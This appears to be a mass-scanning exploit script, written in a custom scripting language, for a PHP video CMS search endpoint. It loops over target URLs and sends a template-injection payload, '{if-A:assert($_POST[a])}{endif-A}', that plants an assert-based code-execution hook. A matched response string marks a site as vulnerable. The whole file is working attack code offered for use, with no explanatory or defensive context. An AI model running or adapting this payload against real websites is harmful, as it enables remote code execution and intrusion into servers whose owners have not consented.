#request urls = array
#define payload = /index.php?m=vod-search&wd=%7bif-A%3aassert(%24_POST%5ba%5d)%7d%7bendif-A%7d
#define bug = 共0条数据&nbsp
#define info = /index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}
#define re = <a href="(.*?)?m=[\s\S]*?

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
